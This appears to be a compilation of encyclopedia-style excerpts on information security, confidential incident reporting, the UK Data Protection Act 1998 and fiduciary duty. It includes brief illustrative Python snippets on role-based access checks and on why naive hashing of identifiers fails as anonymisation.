The business environment is constantly changing and new threats and vulnerabilities emerge every day.[102] Second, the choice of countermeasures (controls) used to manage risks must strike a balance between productivity, cost, effectiveness of the countermeasure, and the value of the informational asset being protected.[103] Furthermore, these processes have limitations, as security breaches are generally rare and emerge in specific contexts which may not be easily duplicated.[104] Thus, any process and countermeasure should itself be evaluated for vulnerabilities.[105] It is not possible to identify all risks, nor is it possible to eliminate all risk. The remaining risk is called "residual risk".[106] A risk assessment is carried out by a team of people who have knowledge of specific areas of the business.[107] Membership of the team may vary over time as different parts of the business are assessed.[108] The assessment may use a subjective qualitative analysis based on informed opinion, or, where reliable dollar figures and historical information are available, the analysis may use quantitative analysis. Research has shown that the most vulnerable point in most information systems is the human user, operator, designer, or other human.[109] The ISO/IEC 27002:2005 Code of practice for information security management recommends that areas such as security policy, the organization of information security, asset management, human resources security, physical and environmental security, communications and operations management, access control, systems acquisition, development, and maintenance, incident management, business continuity management, and regulatory compliance be examined during a risk assessment. In broad terms, the risk management process consists of identifying assets and estimating their value, conducting threat and vulnerability assessments, calculating the likelihood and business impact of each threat exploiting each vulnerability, and then selecting, implementing, and evaluating appropriate controls.[110][111] For any given risk, management can choose to accept the risk based upon the relatively low value of the asset, the relatively low frequency of occurrence, and the relatively low impact on the business.[118] Or, leadership may choose to mitigate the risk by selecting and implementing appropriate control measures to reduce the risk. In some cases, the risk can be transferred to another business by buying insurance or outsourcing to another business.[119] The reality of some risks may be disputed; in such cases leadership may choose to deny the risk.[120] Selecting and implementing proper security controls will initially help an organization bring risk down to acceptable levels.[121] Control selection should follow, and should be based on, the risk assessment.[122] Controls can vary in nature, but fundamentally they are ways of protecting the confidentiality, integrity or availability of information. ISO/IEC 27001 has defined controls in different areas.[123] Organizations can implement additional controls according to their requirements.[124] ISO/IEC 27002 offers a guideline for organizational information security standards.[125] Defense in depth is a fundamental security philosophy that relies on overlapping security systems designed to maintain protection even if individual components fail. Rather than depending on a single security measure, it combines multiple layers of security controls both in the cloud and at network endpoints.
This approach includes combinations like firewalls with intrusion-detection systems, email filtering services with desktop anti-virus, and cloud-based security alongside traditional network defenses.[126] The concept can be implemented through three distinct layers of administrative, logical, and physical controls,[127] or visualized as an onion model with data at the core, surrounded by people, network security, host-based security, and application security layers.[128] The strategy emphasizes that security involves not just technology, but also people and processes working together, with real-time monitoring and response being crucial components.[126] An important aspect of information security and risk management is recognizing the value of information and defining appropriate procedures and protection requirements for the information.[129] Not all information is equal, and so not all information requires the same degree of protection.[130] This requires information to be assigned a security classification.[131] The first step in information classification is to identify a member of senior management as the owner of the particular information to be classified. Next, develop a classification policy.[132] The policy should describe the different classification labels, define the criteria for information to be assigned a particular label, and list the required security controls for each classification.[133] Some factors that influence which classification should be assigned include how much value the information has to the organization, how old the information is, and whether or not the information has become obsolete.[134] Laws and other regulatory requirements are also important considerations when classifying information.[135] The Information Systems Audit and Control Association (ISACA) and its Business Model for Information Security also serve as a tool for security professionals to examine security from a systems perspective, creating an environment where security can be managed holistically, allowing actual risks to be addressed.[136] The type of information security classification labels selected and used will depend on the nature of the organization; examples include labels such as Public, Sensitive, Private, and Confidential in the business sector, and Unclassified, Sensitive but Unclassified, Confidential, Secret, and Top Secret in the government sector.[133] All employees in the organization, as well as business partners, must be trained on the classification schema and understand the required security controls and handling procedures for each classification.[139] The classification assigned to a particular information asset should be reviewed periodically to ensure the classification is still appropriate for the information and to ensure the security controls required by the classification are in place and followed correctly.[140] Access to protected information must be restricted to people who are authorized to access the information.[141] The computer programs, and in many cases the computers that process the information, must also be authorized.[142] This requires that mechanisms be in place to control access to protected information.[142] The sophistication of the access control mechanisms should be in parity with the value of the information being protected; the more sensitive or valuable the information, the stronger the control mechanisms need to be.[143] The foundation on which access control mechanisms are built starts with identification and authentication.[144] Access control is generally considered in three steps: identification, authentication, and authorization.[145][72] Identification is an assertion of who someone is or
what something is. If a person makes the statement "Hello, my name is John Doe", they are making a claim of who they are.[146] However, their claim may or may not be true. Before John Doe can be granted access to protected information, it will be necessary to verify that the person claiming to be John Doe really is John Doe.[147] Typically the claim is in the form of a username: by entering that username, you are claiming "I am the person the username belongs to".[148] Authentication is the act of verifying a claim of identity. When John Doe goes into a bank to make a withdrawal, he tells the bank teller he is John Doe, a claim of identity.[149] The bank teller asks to see a photo ID, so he hands the teller his driver's license.[150] The bank teller checks the license to make sure it has John Doe printed on it and compares the photograph on the license against the person claiming to be John Doe.[151] If the photo and name match the person, then the teller has authenticated that John Doe is who he claimed to be. Similarly, by entering the correct password, the user is providing evidence that he or she is the person the username belongs to.[152] There are three different types of information that can be used for authentication: something you know (such as a password or PIN), something you have (such as an ID card or security token), and something you are (such as a fingerprint or other biometric).[153][154] Strong authentication requires providing more than one type of authentication information (two-factor authentication).[160] The username is the most common form of identification on computer systems today, and the password is the most common form of authentication.[161] Usernames and passwords have served their purpose, but they are increasingly inadequate.[162] They are slowly being replaced or supplemented with more sophisticated authentication mechanisms such as time-based one-time password algorithms.[163] After a person, program or computer has successfully been identified and authenticated, it must be determined what informational resources they are permitted to access and what actions they will be allowed to perform (run, view, create, delete, or change).[164] This is called authorization. Authorization to access information and other computing services begins with administrative policies and procedures.[165] The policies prescribe what information and computing services can be accessed, by whom, and under what conditions. The access control mechanisms are then configured to enforce these policies.[166] Different computing systems are equipped with different kinds of access control mechanisms.
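As a toy illustration of one such mechanism, the sketch below implements a minimal role-based access check; the user, role, and permission names are invented for the example and do not correspond to any particular system:

```python
# Minimal role-based access control (RBAC) sketch.
# Role and permission names are invented for illustration.
ROLE_PERMISSIONS = {
    "clerk":   {"record:view"},
    "auditor": {"record:view", "log:view"},
    "admin":   {"record:view", "record:edit", "log:view"},
}

USER_ROLES = {"alice": {"auditor"}, "bob": {"clerk"}}

def is_authorized(user: str, permission: str) -> bool:
    """A user is authorized if any of their roles grants the permission."""
    return any(permission in ROLE_PERMISSIONS.get(role, set())
               for role in USER_ROLES.get(user, set()))

assert is_authorized("alice", "log:view")
assert not is_authorized("bob", "record:edit")
```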
Some may even offer a choice of different access control mechanisms.[167] The access control mechanism a system offers will be based upon one of three approaches to access control, or it may be derived from a combination of the three.[72] The non-discretionary approach consolidates all access control under a centralized administration.[168] Access to information and other resources is usually based on the individual's function (role) in the organization or the tasks the individual must perform.[169][170] The discretionary approach gives the creator or owner of the information resource the ability to control access to those resources.[168] In the mandatory access control approach, access is granted or denied based upon the security classification assigned to the information resource.[141] Examples of common access control mechanisms in use today include role-based access control, available in many advanced database management systems; simple file permissions provided in the UNIX and Windows operating systems;[171] Group Policy Objects provided in Windows network systems; and Kerberos, RADIUS, TACACS, and the simple access lists used in many firewalls and routers.[172] To be effective, policies and other security controls must be enforceable and upheld. Effective policies ensure that people are held accountable for their actions.[173] The U.S. Treasury's guidelines for systems processing sensitive or proprietary information, for example, state that all failed and successful authentication and access attempts must be logged, and all access to information must leave some type of audit trail.[174] The need-to-know principle also applies to access control: it grants a person access rights only insofar as they are needed to perform their job functions.[175] The principle is used in government when dealing with differing clearances.[176] Even though two employees in different departments have a top-secret clearance, they must have a need to know in order for information to be exchanged. Within the need-to-know principle, network administrators grant the employee the least amount of privilege, to prevent employees from accessing more than they are supposed to.[177] Need-to-know helps to enforce the confidentiality-integrity-availability triad, directly supporting its confidentiality leg.[178] Information security uses cryptography to transform usable information into a form that renders it unusable by anyone other than an authorized user; this process is called encryption.[179] Information that has been encrypted (rendered unusable) can be transformed back into its original usable form by an authorized user who possesses the cryptographic key, through the process of decryption.[180] Cryptography is used in information security to protect information from unauthorized or accidental disclosure while the information is in transit (either electronically or physically) and while it is in storage.[72] Cryptography provides information security with other useful applications as well, including improved authentication methods, message digests, digital signatures, non-repudiation, and encrypted network communications.[181] Older, less secure applications such as Telnet and File Transfer Protocol (FTP) are slowly being replaced with more secure applications such as Secure Shell (SSH) that use encrypted network communications.[182] Wireless communications can be encrypted using protocols such as WPA/WPA2 or the older (and less secure) WEP.
Wired communications (such as ITU-T G.hn) are secured using AES for encryption and X.1035 for authentication and key exchange.[183] Software applications such as GnuPG or PGP can be used to encrypt data files and email.[184] Cryptography can introduce security problems when it is not implemented correctly.[185] Cryptographic solutions need to be implemented using industry-accepted solutions that have undergone rigorous peer review by independent experts in cryptography.[186] The length and strength of the encryption key is also an important consideration.[187] A key that is weak or too short will produce weak encryption.[187] The keys used for encryption and decryption must be protected with the same degree of rigor as any other confidential information.[188] They must be protected from unauthorized disclosure and destruction, and they must be available when needed.[citation needed] Public key infrastructure (PKI) solutions address many of the problems that surround key management.[72] U.S. Federal Sentencing Guidelines now make it possible to hold corporate officers liable for failing to exercise due care and due diligence in the management of their information systems.[189] In the field of information security, Harris[190] offers the following definitions of due care and due diligence: "Due care are steps that are taken to show that a company has taken responsibility for the activities that take place within the corporation and has taken the necessary steps to help protect the company, its resources, and employees."[191] And, "[due diligence are the] continual activities that make sure the protection mechanisms are continually maintained and operational."[192] Attention should be paid to two important points in these definitions.[193][194] First, in due care, steps are taken to show: this means that the steps can be verified, measured, or even produce tangible artifacts.[195][196] Second, in due diligence, there are continual activities: this means that people are actually doing things to monitor and maintain the protection mechanisms, and that these activities are ongoing.[197] Organizations have a responsibility to practice duty of care when applying information security.
The Duty of Care Risk Analysis Standard (DoCRA)[198] provides principles and practices for evaluating risk.[199] It considers all parties that could be affected by those risks.[200] DoCRA helps evaluate whether safeguards are appropriate in protecting others from harm while presenting a reasonable burden.[201] With increased data breach litigation, companies must balance security controls, compliance, and their mission.[202] Computer security incident management is a specialized form of incident management focused on monitoring, detecting, and responding to security events on computers and networks in a predictable way.[203] Organizations implement this through incident response plans (IRPs) that are activated when security breaches are detected.[204] These plans typically involve an incident response team (IRT) with specialized skills in areas like penetration testing, computer forensics, and network security.[205] Change management is a formal process for directing and controlling alterations to the information processing environment.[206][207] This includes alterations to desktop computers, the network, servers, and software.[208] The objectives of change management are to reduce the risks posed by changes to the information processing environment and to improve the stability and reliability of the processing environment as changes are made.[209] It is not the objective of change management to prevent or hinder necessary changes from being implemented.[210][211] Any change to the information processing environment introduces an element of risk.[212] Even apparently simple changes can have unexpected effects.[213] One of management's many responsibilities is the management of risk.[214][215] Change management is a tool for managing the risks introduced by changes to the information processing environment.[216] Part of the change management process ensures that changes are not implemented at inopportune times when they may disrupt critical business processes or interfere with other changes being implemented.[217] Not every change needs to be managed.[218][219] Some kinds of changes are a part of the everyday routine of information processing and adhere to a predefined procedure, which reduces the overall level of risk to the processing environment.[220] Creating a new user account or deploying a new desktop computer are examples of changes that do not generally require change management.[221] However, relocating user file shares or upgrading the email server pose a much higher level of risk to the processing environment and are not a normal everyday activity.[222] The critical first steps in change management are (a) defining change (and communicating that definition) and (b) defining the scope of the change system.[223] Change management is usually overseen by a change review board composed of representatives from key business areas,[224] security, networking, systems administration, database administration, application development, desktop support, and the help desk.[225] The tasks of the change review board can be facilitated with the use of an automated workflow application.[226] The responsibility of the change review board is to ensure the organization's documented change management procedures are followed.[227] The change management process broadly runs from requesting and approving a change, through planning, testing, scheduling, and communicating it, to implementing it, documenting it, and conducting a post-change review.[228] Change management procedures that are simple to follow and easy to use can greatly reduce the overall risks created when changes are made to the information processing environment.[260] Good change management procedures improve the overall quality and
success of changes as they are implemented.[261] This is accomplished through planning, peer review, documentation, and communication.[262] ISO/IEC 20000, The Visible OPS Handbook: Implementing ITIL in 4 Practical and Auditable Steps[263] (full book summary),[264] and ITIL all provide valuable guidance on implementing an efficient and effective information security change management program.[265] Business continuity management (BCM) concerns arrangements aiming to protect an organization's critical business functions from interruption due to incidents, or at least to minimize the effects.[266][267] BCM is essential to any organization for keeping technology and business in line with current threats to the continuation of business as usual.[268] BCM should be included in an organization's risk analysis plan to ensure that all of the necessary business functions have what they need to keep going in the event of any type of threat to any business function.[269] It encompasses the analysis of requirements (for example, through business impact analysis), the specification and design of continuity arrangements, their implementation and testing, and their ongoing management and assurance. Whereas BCM takes a broad approach to minimizing disaster-related risks by reducing both the probability and the severity of incidents, a disaster recovery plan (DRP) focuses specifically on resuming business operations as quickly as possible after a disaster.[279] A disaster recovery plan, invoked soon after a disaster occurs, lays out the steps necessary to recover critical information and communications technology (ICT) infrastructure.[280] Disaster recovery planning includes establishing a planning group, performing risk assessment, establishing priorities, developing recovery strategies, preparing inventories and documentation of the plan, developing verification criteria and procedures, and lastly implementing the plan.[281] Many governmental laws and regulations around the world have had, or will have, a significant effect on data processing and information security,[282][283] as have important industry-sector regulations.[282] The US Department of Defense (DoD) issued DoD Directive 8570 in 2004, supplemented by DoD Directive 8140, requiring all DoD employees and all DoD contract personnel involved in information assurance roles and activities to earn and maintain various industry Information Technology (IT) certifications, in an effort to ensure that all DoD personnel involved in network infrastructure defense have minimum levels of IT-industry-recognized knowledge, skills and abilities (KSA). Andersson and Reimers (2019) report that these certifications range from CompTIA's A+ and Security+ through (ISC)²'s CISSP, etc.[318] Describing more than simply how security-aware employees are, information security culture is the ideas, customs, and social behaviors of an organization that impact information security in both positive and negative ways.[319] Cultural concepts can help different segments of the organization work effectively, or work against effectiveness, towards information security within an organization. The way employees think and feel about security and the actions they take can have a big impact on information security in organizations.
Roer & Petric (2017) identify seven core dimensions of information security culture in organizations: attitudes, behaviors, cognition, communication, compliance, norms, and responsibilities.[320] Andersson and Reimers (2014) found that employees often do not see themselves as part of the organization's information security "effort" and often take actions that ignore organizational information security best interests.[322] Research shows that information security culture needs to be improved continuously. In Information Security Culture from Analysis to Change, the authors commented, "It's a never ending process, a cycle of evaluation and change or maintenance." To manage the information security culture, five steps should be taken: pre-evaluation, strategic planning, operative planning, implementation, and post-evaluation.[323]
https://en.wikipedia.org/wiki/Confidentiality,_integrity,_and_availability
A confidential incident reporting system is a mechanism which allows problems in safety-critical fields such as aviation and medicine to be reported in confidence. This allows events to be reported which otherwise might not be, through fear of blame or reprisals against the reporter. Analysis of the reported incidents can provide insight into how those events occurred, which can spur the development of measures to make the system safer.[1][2] The Aviation Safety Reporting System, created by the US aviation industry in 1976, was one of the earliest confidential reporting systems. The International Confidential Aviation Safety Systems Group is an umbrella organization for confidential reporting systems in the airline industry.[3] It has been suggested that medical organizations also adopt the confidential reporting model.[6] Examples of confidential reporting in medicine include CORESS, a confidential reporting system for surgery in the United Kingdom.[7]
https://en.wikipedia.org/wiki/Confidential_reporting_system
The Data Protection Act 1998 (c. 29) (DPA) was an act of Parliament of the United Kingdom designed to protect personal data stored on computers or in an organised paper filing system. It enacted provisions from the European Union (EU) Data Protection Directive 1995 on the protection, processing, and movement of data. Under the 1998 DPA, individuals had legal rights to control information about themselves. Most of the Act did not apply to domestic use,[1] such as keeping a personal address book. Anyone holding personal data for other purposes was legally obliged to comply with the Act, subject to some exemptions. The Act defined eight data protection principles to ensure that information was processed lawfully. It was superseded by the Data Protection Act 2018 (DPA 2018) on 23 May 2018. The DPA 2018 supplements the EU General Data Protection Regulation (GDPR), which came into effect on 25 May 2018 and which regulates the collection, storage, and use of personal data significantly more strictly.[2] The 1998 act replaced the Data Protection Act 1984 (c. 35) and the Access to Personal Files Act 1987 (c. 37), and implemented the EU Data Protection Directive 1995. The Privacy and Electronic Communications (EC Directive) Regulations 2003 altered the consent requirement for most electronic marketing to "positive consent", such as an opt-in box. Exemptions remain for the marketing of "similar products and services" to existing customers and enquirers, which can still be permitted on an opt-out basis. The Jersey data protection law, the Data Protection (Jersey) Law 2005, was modelled on the United Kingdom's law.[3] Section 1 of DPA 1998 defined "personal data" as any data that could have been used to identify a living individual. Anonymised or aggregated data was less regulated by the Act, provided the anonymisation or aggregation had not been done reversibly. Individuals could have been identified by various means, including name and address, telephone number, or email address. The Act applied only to data which was held, or was intended to be held, on computers ("equipment operating automatically in response to instructions given for that purpose"), or held in a "relevant filing system".[4] In some cases, paper records could have been classified as a relevant filing system, such as an address book or a salesperson's diary used to support commercial activities.[5] The Freedom of Information Act 2000 modified the act for public bodies and authorities, and the Durant case modified the interpretation of the act by providing case law and precedent.[6] A person who had their data processed had rights including access to a copy of the data, the rectification of inaccurate data, the prevention of processing likely to cause damage or distress, and the prevention of processing for direct marketing.[7][8] Schedule 1 listed eight "data protection principles"; broadly speaking, these eight principles were similar to the six principles set out in the GDPR of 2016.[14] Personal data should only be processed fairly and lawfully. In order for data to be classed as "fairly processed", at least one of six conditions had to be applicable to that data (Schedule 2). Except under the exceptions mentioned below, the individual had to consent to the collection of their personal information[16] and its use in the purpose(s) in question.
The European Data Protection Directive defined consent as "…any freely given specific and informed indication of his wishes by which the data subject signifies his agreement to personal data relating to him being processed", meaning the individual could have signified agreement other than in writing.[citation needed] However, non-communication should not have been interpreted as consent. Additionally, consent should have been appropriate to the age and capacity of the individual and other circumstances of the case. If an organisation "intends to continue to hold or use personal data after the relationship with the individual ends, then the consent should cover this." When consent was given, it was not assumed to last forever, though in most cases consent lasted for as long as the personal data needed to be processed, and individuals may have been able to withdraw their consent, depending on the nature of the consent and the circumstances in which the personal information was collected and used.[17] The Data Protection Act also specified that sensitive personal data must have been processed according to a stricter set of conditions; in particular, any consent must have been explicit.[17] The Act was structured such that all processing of personal data was covered by the Act, while providing a number of exemptions in Part IV,[1] notably for national security, crime and taxation, domestic purposes, and journalistic, literary, or artistic purposes. The Act granted or acknowledged various police and court powers. The Act detailed a number of civil and criminal offences for which data controllers may have been liable if a data controller had failed to gain appropriate consent from a data subject. However, consent was not specifically defined in the Act and so was a common law matter. The UK Data Protection Act was a large act that had a reputation for complexity.[25] While the basic principles were honoured for protecting privacy, interpreting the act was not always simple. Many companies, organisations, and individuals seemed very unsure of the aims, content, and principles of the Act. Some refused to provide even very basic, publicly available material, quoting the Act as a restriction.[26] The Act also impacted the way in which organisations conducted business in terms of who should have been contacted for marketing purposes, not only by telephone and direct mail but also electronically. This has led to the development of permission-based marketing strategies.[27] The Act defined personal data as data relating to a living individual who could be identified from those data, or from those data together with other information in the possession of (or likely to come into the possession of) the data controller. Sensitive personal data concerned the subject's race, ethnicity, politics, religion, trade union status, health, sexual history, or criminal record.[28] The Information Commissioner's Office website stated regarding subject access requests:[29] "You have the right to find out if an organisation is using or storing your personal data. This is called the right of access. You exercise this right by asking for a copy of the data, which is commonly known as making a 'subject access request.'" Before the General Data Protection Regulation (GDPR) came into force on 25 May 2018, organisations could charge a specified fee of up to £10 for responding to most SARs. Following GDPR: "A copy of your personal data should be provided free. An organisation may charge for additional copies. It can only charge a fee if it thinks the request is 'manifestly unfounded or excessive'.
If so, it may ask for a reasonable fee for administrative costs associated with the request."[29] Compliance with the Act was regulated and enforced by an independent authority, the Information Commissioner's Office, which maintained guidance relating to the Act.[30][31] In January 2017, the Information Commissioner's Office invited public comments on the EU's Article 29 Working Party's proposed changes to data protection law and the anticipated introduction of extensions to the interpretation of the Act, the Guide to the General Data Protection Regulation.[32]
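The Act's distinction between reversible and irreversible anonymisation, noted above, has a concrete technical side. The sketch below is illustrative only, with invented identifiers and key, and is not legal guidance: it shows why naively hashing an identifier remains reversible when the space of possible identifiers is small, whereas keyed pseudonymisation removes that avenue while still leaving the data re-linkable (and hence personal data) in the controller's hands:

```python
import hashlib, hmac

# Naive "anonymisation" by hashing is reversible when the identifier
# space is small: an attacker can simply hash every candidate value.
def naive_token(national_id: str) -> str:
    return hashlib.sha256(national_id.encode()).hexdigest()

token = naive_token("AB123456C")          # invented identifier
candidates = ["AB123456C", "ZZ999999Z"]   # toy candidate space
recovered = next(c for c in candidates if naive_token(c) == token)
assert recovered == "AB123456C"           # the "anonymous" token is reversed

# Keyed pseudonymisation: without the secret key the mapping cannot be
# recomputed, but the controller can still link records, so the data
# remains personal data rather than anonymous data.
SECRET_KEY = b"hypothetical-key-held-by-the-controller"
def pseudonym(national_id: str) -> str:
    return hmac.new(SECRET_KEY, national_id.encode(), hashlib.sha256).hexdigest()
```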
https://en.wikipedia.org/wiki/Data_Protection_Act_1998
A fiduciary is a person who holds a legal or ethical relationship of trust with one or more other parties (legal person or group of persons). Typically, a fiduciary prudently takes care of money or other assets for another person. One party, for example a corporate trust company or the trust department of a bank, acts in a fiduciary capacity to another party who, for example, has entrusted funds to the fiduciary for safekeeping or investment. Likewise, financial advisers, financial planners, and asset managers, including managers of pension plans, endowments, and other tax-exempt assets, are considered fiduciaries under applicable statutes and laws.[1] In a fiduciary relationship, one person, in a position of vulnerability, justifiably vests confidence, good faith, reliance, and trust in another whose aid, advice, or protection is sought in some matter.[2]: 68 [3] In such a relation, good conscience requires the fiduciary to act at all times for the sole benefit and interest of the one who trusts. A fiduciary is someone who has undertaken to act for and on behalf of another in a particular matter in circumstances which give rise to a relationship of trust and confidence. Fiduciary duties in a financial sense exist to ensure that those who manage other people's money act in their beneficiaries' interests, rather than serving their own interests. A fiduciary duty[5] is the highest standard of care in equity or law. A fiduciary is expected to be extremely loyal to the person to whom he owes the duty (the "principal"), such that there must be no conflict of duty between fiduciary and principal, and the fiduciary must not profit from their position as a fiduciary[6] unless the principal consents.[7] The nature of fiduciary obligations differs among jurisdictions. In Australia, only proscriptive or negative fiduciary obligations are recognised,[3]: 113 [8]: 198 [9] whereas in Canada, fiduciaries can come under both proscriptive (negative) and prescriptive (positive) fiduciary obligations.[10][11] In English common law, the fiduciary relation is an important concept within a part of the legal system known as equity. In the United Kingdom, the Judicature Acts merged the courts of equity (historically based in England's Court of Chancery) with the courts of common law, and as a result the concept of fiduciary duty also became applicable in common law courts. When a fiduciary duty is imposed, equity requires a different, stricter standard of behavior than the comparable tortious duty of care in common law. The fiduciary has a duty not to be in a situation where personal interests and fiduciary duty conflict, not to be in a situation where their fiduciary duty conflicts with another fiduciary duty, and not to profit from their fiduciary position without knowledge and consent. A fiduciary ideally would not have a conflict of interest.
It has been said that fiduciaries must conduct themselves "at a level higher than that trodden by the crowd"[12] and that "[t]he distinguishing or overriding duty of a fiduciary is the obligation of undivided loyalty".[13]: 289 Different jurisdictions regard fiduciary duties in different lights. Canadian law, for example, has developed a more expansive view of fiduciary obligation than American law,[14] while Australian law and British law have developed more conservative approaches than either the United States or Canada.[3] In Australia, it has been found that there is no comprehensive list of criteria by which to establish a fiduciary relationship.[13] Courts have so far refused to define the concept of a fiduciary, instead preferring to develop the law on a case-by-case basis and by way of analogy.[2][8] Fiduciary relationships are of different types and carry different obligations, so that a test appropriate to determine whether a fiduciary relationship exists for one purpose might be inappropriate for another.[2] In 2014 the Law Commission (England and Wales) reviewed the fiduciary duties of investment intermediaries, looking particularly at the duties on pension trustees. They commented that the term "fiduciary" is used in many different ways: fiduciary duties cannot be understood in isolation; instead they are better viewed as "legal polyfilla", moulding themselves flexibly around other legal structures and sometimes filling the gaps. The question of who is a fiduciary is a "notoriously intractable" question, and this was the first of many questions. In SEC v. Chenery Corporation,[16] Frankfurter J said: To say that a man is a fiduciary only begins the analysis; it gives direction to further inquiry. To whom is he a fiduciary? What obligations does he owe as a fiduciary? In what respect has he failed to discharge these obligations? And what are the consequences of his deviation from his duty? The law expressed here follows the general body of elementary fiduciary law found in most common law jurisdictions; for in-depth analysis of particular jurisdictional idiosyncrasies, please consult primary authorities within the relevant jurisdiction. This is especially true in the area of labor and employment law. In Canada a fiduciary has obligations to the employer even after the employment relationship is terminated, whereas in the United States the employment and fiduciary relationships terminate together. The corporate law of Delaware is the most influential in the United States, as more than 50% of publicly traded companies in the United States, including 64% of the Fortune 500, have chosen to incorporate in that state.[17] Under Delaware law, officers, directors and other control persons of corporations and other entities owe three primary fiduciary duties: (1) the duty of care, (2) the duty of loyalty, and (3) the duty of good faith.[18] The duty of care requires control persons to act on an informed basis after due consideration of all information. The duty includes a requirement that such persons reasonably inform themselves of alternatives. In doing so, they may rely on employees and other advisers so long as they do so with a critical eye and do not unquestioningly accept the information and conclusions provided to them.
Under normal circumstances, their actions are accorded the protection of the business judgment rule, which presumes that control persons acted properly, provided that they act on an informed basis, in good faith and in the honest belief that the action taken was in the best interests of the company.[18]

The duty of loyalty requires control persons to look to the interests of the company and its other owners and not to their personal interests. In general, they cannot use their positions of trust, confidence and inside knowledge to further their own private interests or approve an action that will provide them with a personal benefit (such as continued employment) that does not primarily benefit the company or its other owners.[18]

The duty of good faith requires control persons to exercise care and prudence in making business decisions—that is, the care that a reasonably prudent person in a similar position would use under similar circumstances. Control persons fail to act in good faith, even if their actions are not illegal, when they take actions for improper purposes or, in certain circumstances, when their actions have grossly inequitable results. The duty to act in good faith is an obligation not only to make decisions free from self-interest, but also free of any interest that diverts the control persons from acting in the best interest of the company. The duty to act in good faith may be measured by an individual's particular knowledge and expertise: the higher the level of expertise, the more accountable that person will be (e.g., a finance expert may be held to a more exacting standard than others in accepting a third-party valuation).[18]

At one time, courts seemed to view the duty of good faith as an independent obligation. However, more recently, courts have treated the duty of good faith as a component of the duty of loyalty.[18][19]

In Canada, directors of corporations owe a fiduciary duty. A debate exists as to the nature and extent of this duty following a controversial landmark judgment from the Supreme Court of Canada in BCE Inc. v. 1976 Debentureholders. Scholarly literature has defined this as a "tripartite fiduciary duty", composed of (1) an overarching duty to the corporation, which contains two component duties—(2) a duty to protect shareholder interests from harm, and (3) a procedural duty of "fair treatment" for relevant stakeholder interests. This tripartite structure encapsulates the duty of directors to act in the "best interests of the corporation, viewed as a good corporate citizen".[14]

The most common circumstance where a fiduciary duty will arise is between a trustee, whether real or juristic, and a beneficiary. The trustee, to whom property is legally committed, is the legal—i.e., common law—owner of all such property. The beneficiary, at law, has no legal title to the trust; however, the trustee is bound by equity to suppress their own interests and administer the property only for the benefit of the beneficiary. In this way, the beneficiary obtains the use of property without being its technical owner.

Others, such as corporate directors, may be held to a fiduciary duty similar in some respects to that of a trustee. This happens when, for example, the directors of a bank are trustees for the depositors, the directors of a corporation are trustees for the stockholders, or a guardian is trustee of their ward's property.
A person in a sensitive position sometimes protects themselves from possible conflict-of-interest charges by setting up a blind trust, placing their financial affairs in the hands of a fiduciary and giving up all right to know about or intervene in their handling. The fiduciary functions of trusts and agencies are commonly performed by a trust company, such as a commercial bank, organized for that purpose. In the United States, the Office of the Comptroller of the Currency (OCC), an agency of the United States Department of the Treasury, is the primary regulator of the fiduciary activities of federal savings associations.

When a court desires to hold the offending party to a transaction responsible so as to prevent unjust enrichment, the judge can declare that a fiduciary relation exists between the parties, as though the offender were in fact a trustee for the partner. Certain classes of relationship routinely attract a fiduciary duty by law; in Australia, the categories of fiduciary relationships are not closed.[2][8]

Roman and civil law recognized a type of contract called fiducia (also contractus fiduciae or fiduciary contract), involving essentially a sale to a person coupled with an agreement that the purchaser should sell the property back upon the fulfillment of certain conditions.[52] Such contracts were used in the emancipation of children, in connection with testamentary gifts, and in pledges. Under Roman law a woman could arrange a fictitious sale called a fiduciary coemption in order to change her guardian or gain legal capacity to make a will.[53]

In Roman Dutch law, a fiduciary heir may receive property subject to passing it to another on fulfilment of certain conditions; the gift is called a fideicommissum. The fiduciary of a fideicommissum is a fideicommissioner, and one who receives property from a fiduciary heir is a fideicommissary heir.[54]

Fiduciary principles may be applied in a variety of legal contexts.[55] Joint ventures, as opposed to business partnerships,[38] are not presumed to carry a fiduciary duty; however, this is a matter of degree.[56][57] If a joint venture is conducted at commercial arm's length and both parties are on an equal footing, then the courts will be reluctant to find a fiduciary duty, but if the joint venture is carried out more in the manner of a partnership, then fiduciary relationships can and often will arise.[58][59][56]

Husbands and wives are not presumed to be in a fiduciary relationship in many jurisdictions; however, this may be easily established. Similarly, ordinary commercial transactions in themselves are not presumed to give rise to fiduciary duties, but can do so should the appropriate circumstances arise. These are usually circumstances where the contract specifies a degree of trust and loyalty, or where it can be inferred by the court.[2][60]

Australian courts also do not recognise parents and their children to be in fiduciary relationships.[48][61][62] In contrast, the Supreme Court of Canada allowed a child to sue her father for damages for breach of his fiduciary duties, opening the door in Canada to recognising fiduciary obligations between parent and child.[63]

Australian courts have also not accepted doctor-patient relationships as fiduciary in nature. In Breen v Williams,[3] the High Court viewed the doctor's responsibilities over their patients as lacking the representative capacity of the trustee in fiduciary relationships.
Moreover, the existence of remedies in contract and tort made the Court reluctant to recognise a fiduciary relationship there.

In 2011, in an insider trading case, the U.S. Securities and Exchange Commission brought charges against the boyfriend of a Disney intern, alleging that he had a fiduciary duty to his girlfriend and had breached it. The boyfriend, Toby Scammell, allegedly received and used insider information on Disney's takeover of Marvel Comics.[64][65]

Generally, the employment relationship is not regarded as fiduciary, but may be so if ... within a particular contractual relationship there are specific contractual obligations which the employee has undertaken which have placed him in a situation where equity imposes these rigorous duties in addition to the contractual obligations. Although terminology like duty of good faith, or loyalty, or the mutual duty of trust and confidence is frequently used to describe employment relationships, such concepts usually denote situations where "a party merely has to take into consideration the interests of another, but does not have to act in the interests of that other".[66]

If fiduciary relationships are to arise between employers and employees, it is necessary to ascertain that the employee has placed himself in a position where he must act solely in the interests of his employer.[66] In the case of Canadian Aero Service Ltd v O'Malley,[67] it was held that a senior employee is much more likely to be found to owe fiduciary duties towards his employer.

In 2015, the United States Department of Labor issued a proposed rule that, if finalized, would have extended the fiduciary duty relationship to investment advisors and some brokers, including insurance brokers.[68] In 2017, the first Trump administration planned to order a 180-day delay of implementation of the rule,[69] sometimes known as the 'fiduciary rule'.[70] The rule would have required "brokers offering retirement investment advice to put their clients' interest first".[69] The Trump administration later rescinded the fiduciary rule on July 20, 2018.[71][72] Prior to its repeal, the rule was also dealt blows by the US Fifth Circuit Court of Appeals in March and June 2018.[73]

For example, two members, X and Y, of a band currently under contract with one another (or with some other tangible, existing relationship that creates a legal duty) record songs together. Let us imagine it is a serious, successful band and that a court would declare that the two members are equal partners in a business. One day, X takes some demos made cooperatively by the duo to a recording label, where an executive expresses interest. X pretends it is all his own work and receives an exclusive contract and $50,000. Y is unaware of the encounter until reading about it in the paper the next week.

